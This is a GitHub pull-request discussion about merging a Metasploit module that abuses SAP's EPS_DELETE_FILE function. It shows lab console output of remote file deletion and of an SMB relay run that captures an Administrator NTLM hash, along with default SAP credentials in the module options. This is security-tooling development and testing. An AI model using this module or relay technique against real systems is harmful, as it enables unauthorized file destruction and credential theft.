EPS_DELETE_FILE (File Deletion and SMB Relay) #1659

Merged
merged 1 commit into from May 9, 2013

Projects

None yet

2 participants

@nmonkee

A vulnerability in the SAP EPS_DELETE_FILE RFC function allows an attacker to delete files remotely and/or steal hashes using an SMB relay attack.

SAP Note 1554030 / DSECRG-11-031.

ref: http://dsecrg.com/pages/vul/show.php?id=331

@jvazquez-r7 jvazquez-r7 referenced this pull request in nmonkee/metasploit-framework May 6, 2013
Merged

Cleanup for sap_soap_rfc_eps_delete_file #7

@jvazquez-r7

Hi @nmonkee,

The pull request nmonkee#7 is applying the same changes proposed on last pull requests such as #1658, plus is moving the module to the "dos" tree, because a file deletion module is a dos module indeed. Even when it also helps to make SMBRelay attacks, it can also be done by other auxiliary scanner modules, so I thing the auxiliary/dos/sap is the correct place for this modules. As always feel free to review, test, ask, discuss anything and merge nmonkee#7 on your repo when ready. So this pull request will be automatically updated and we'll be ready to merge :)

Testing after changes:

msf auxiliary(sap_soap_rfc_eps_delete_file) > show options

Module options (auxiliary/dos/sap/sap_soap_rfc_eps_delete_file):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CLIENT    001              yes       SAP Client
   DIRNAME   /tmp             yes       Directory Path which contains the file to delete
   FILENAME  msf.txt          yes       Filename to delete
   PASSWORD  06071992         yes       Password
   Proxies                    no        Use a proxy chain
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     80               yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME  SAP*             yes       Username
   VHOST                      no        HTTP server virtual host

msf auxiliary(sap_soap_rfc_eps_delete_file) > run

[+] 192.168.172.179:8042 - File msf.txt at /tmp successfully deleted
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@nmonkee

Not that I am that fussed, seems that this error is received and the file is not deleted on Linux and Windows. However makes it an ineffective DoS module ;)


<?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>SOAP-ENV:Client</faultcode><faultstring>DELETE_FAILED</faultstring><detail><rfc:EPS_DELETE_FILE.Exception xmlns:rfc="urn:sap-com:document:sap:rfc:functions"><Name>DELETE_FAILED</Name></rfc:EPS_DELETE_FILE.Exception></detail></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope>

SMB Relay works fine:


msf auxiliary(sap_soap_rfc_eps_delete_file) > run
[*] 192.168.1.86:8000 - Sending request to delete msf.txt at \\192.168.1.71\foo
[*] SMB Captured - 2013-05-09 21:20:07 +0100
NTLMv1 Response Captured from 192.168.1.86:50768 - 192.168.1.86 
USER:Administrator DOMAIN:GATEWAY OS: LM:
LMHASH:Disabled 
NTHASH:d9d3c192407bc93152376e16d6a3a3fa9aa53b3cf940f8d4
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
@jvazquez-r7

No, it's important, checking....

@nmonkee

A search on the error, suggests case sensitivity is important.

@jvazquez-r7

Working as expected when the owner of the file to delete is npladm

msf auxiliary(sap_soap_rfc_eps_delete_file) > run

[*] 192.168.172.179:8042 - Sending request to delete w00t at /tmp/
[+] 192.168.172.179:8042 - File w00t at /tmp/ successfully deleted
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

merging!

@jvazquez-r7 jvazquez-r7 pushed a commit that referenced this pull request May 9, 2013
jvazquez-r7 Land #1659, @nmonkee's sap_soap_rfc_eps_delete_file module 3e1d1a3
@jvazquez-r7 jvazquez-r7 merged commit 7ad73d8 into rapid7:master May 9, 2013

1 check passed

Details default The Travis CI build passed
@nmonkee
@nmonkee nmonkee deleted the nmonkee:sap_soap_rfc_eps_delete_file_smb_relay branch May 9, 2013
@jvazquez-r7

Checking on windows!

@jvazquez-r7

Fixed the error on windows:

msf auxiliary(sap_soap_rfc_eps_delete_file) > reload
[*] Reloading module...
msf auxiliary(sap_soap_rfc_eps_delete_file) > run

[*] 192.168.172.185:8000 - Sending request to delete foo.txt at c:\
[+] 192.168.172.185:8000 - File foo.txt at c:\ successfully deleted
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

See: d37d211

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment